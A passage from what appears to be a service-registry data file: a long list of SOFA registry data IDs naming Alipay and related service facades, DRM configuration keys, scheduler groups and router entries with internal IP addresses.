STANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:promobench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_G_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linepay.common.serivce.facade.mng.channel.ChannelManipulateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.accdata.AccountDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_xflush#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finadvisorprod.common.service.facade.api.InspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.securityprod.ValidateLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot-study01@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zifim:name=com.alipay.fc.common.lang.drm.AntBizMonitorCfgDrm.monitorFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.yqdataservice.common.service.facade.po.PoProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-gmcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.igopcore.common.service.facade.QueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.CacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.locales.facade.LocalesCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficintelbiz.common.service.facade.api.TrafficCorpCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.unibase.common.service.facade.api.activity.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icif.service.facade.api.UserQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.engine.config.RuleEngineResource.ruleDomainConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ipci#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.trade.service.TradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-sffcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.ConfigApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1501#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.facade.api.topic.TopicCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendPublicMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.approval.ApprovalProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.230.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprod.common.service.facade.condition.api.SecurityConditionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_voucherTemplateCancelCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.box.api.BoxCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.triple.ForestCatalogNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataanalyser.common.service.facade.BianShenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKTempManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iusergrowthus.facade.api.StudentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.msgTemplateItem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:equitymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ipromotion.common.service.facade.api.campaign.PrizeAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.query.AccOrderTypeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitydata.common.service.facade.variable.OpenVariableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.noSignOrderPsCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scheduler.common.service.facade.update.GlobalTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:emembercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.mrchka.railway.RailwayClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.RewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.215.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.96.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.mrchooda.facade.DecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.CategoryDefineService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcloanbenefit@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.ResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.biz.price.service.ApportionPriceAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioiriscore.common.service.facade.IrisRepoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.210.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.card.api.MarketQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.StrategyAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-MWALLETMNG-WIDGET-EXPIRY-SCAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:hyp-DCDataSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTEST_TOPIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opensupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisioncenter.common.service.facade.api.DecideQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ApiVersionManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.smart.DeclareMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.facade.service.access.LogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkkycprod.common.service.facade.trust.dualrecord.service.DualRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentReadFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activitymanage.ActivityLimitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_PREPAID#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketProcessStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_RTCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileappcommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:mcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_intopermanager_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprodapicore.facade.manageapi.ApiSuiteManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.SecondPartySelectionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_OPS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:airbops_BusinessExamCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:bops@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:protocol-https@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","twa.docker.app:1.0@bffserviceone#@#DEFAULT_INSTANCE_ID#@#TWA","com.alipay.ebppgw.facade.mng.ParserTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.core.engine.front.service.DataRecoverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acauditcenter.facade.SubscriptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PSSLIP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.52.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.batchfund.common.service.facade.file.api.FileStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.discount.common.service.facade.management.CampRelateSubjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.theme.ThemeTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksettlecenter.service.facade.api.SettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ssprod.common.service.facade.assets.SocialAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.notice.NoticeManageFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.strategy.api.CtuExcludeStrategy:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.admin.IndustryInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-unitestcenter-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findatacanal.common.service.manage.gildata.GdMfNottextannouncementSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.74.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settleprod.service.facade.gcard.PhoneCardFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.dataAsset.DataAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:instfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.strategy.service.facade.api.serve.ServeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdesk.common.service.facade.api.KbDeskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker-tutorial:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionPreApplySuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antquality.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:midas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.CodeApiGFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointcore:name=com.alipay.pointcore.common.service.integration.drm.resource.BudgetLibSceneCheckControlResource.budgetCodeWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fporgassetfinancing.common.service.facade.api.FinPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.themeTairExpiresTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenestarwish.common.service.facade.api.FinsBizDTXFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditoverseaprod.facade.service.amountrate.AmountRateAggregateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstprod.common.service.facade.api.cleanup.InstUserCleanupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.api.EquitySendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@cifprocess#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finorm.finriskcenter.common.facade.api.guardian.DrillInjectEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:afcgfcenter_workflowProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SCHEMA@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:antsportsmngsff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kbasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.mmcard.ShareEmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.payment.cashierpay.AgreementPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.mng.facade.CardMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.greyPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbprizeprod.common.service.facade.CertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.158.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.barcodeprod.common.service.facade.sessioncode.SessionCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.console.service.facade.ProfileNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraph.facade.GraphExploreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.MYBKRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointDaySummaryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.faasset.api.FaAssetAlterationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocommopt.com.service.facade.api.NearbyMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.koubei.kbretailprod.common.facade.promo.ScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.InfrastructureInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finlinkdata.common.service.facade.contract.service.InstContractDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.transform.ConfigMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ServiceBeanMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.savingplan.api.SavingPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_REGISTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.resource.common.facade.api.UdfRefResourceOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.MerchantInfoAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.ext.LoginUserSessionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.SnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.OtmPayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpmetaportal.common.facade.api.ProductApi:1.0:dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.TrafficActivityPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.promocenter.facade.api.galaxy.XMktUnionActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilebc.common.service.facade.spi.EquityConsultCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.agaccesstoken.AgATKIdentificationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.buc.acl.api.service.DataPermissionModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.integration.biscenter.UEMProcessServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.preferential.PreferentialAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.113.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zskynet.zskynetDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsEndorseInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaWeeklyCallDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.IMChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.membertangram.common.service.facade.subscribe.SubscribeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ecquery.common.service.account.LoanLendDefQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.GroupRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.transfer.BatchTransQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.ipay.icif.service.facade.query.UserReferenceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileapp.common.service.facade.account.AccountThroughService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisSpTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.alipayDiscountVoucher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antpim.common.service.facade.chain.ChainDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.rest.facade.SampleRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.serviceDataEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ssprod.common.service.facade.order.SocialOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.biz.webservice.manager.WebServiceConfigManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.SettlePayInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.shared.gildata.service.GdShNumberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.servicelist.ServiceListOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.QueryUriRepositoryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceListQueryApi:1.0:v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.benefit.BenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.eco.ots.user.EcoTableStoreUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.ExternalAdvertReachRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.s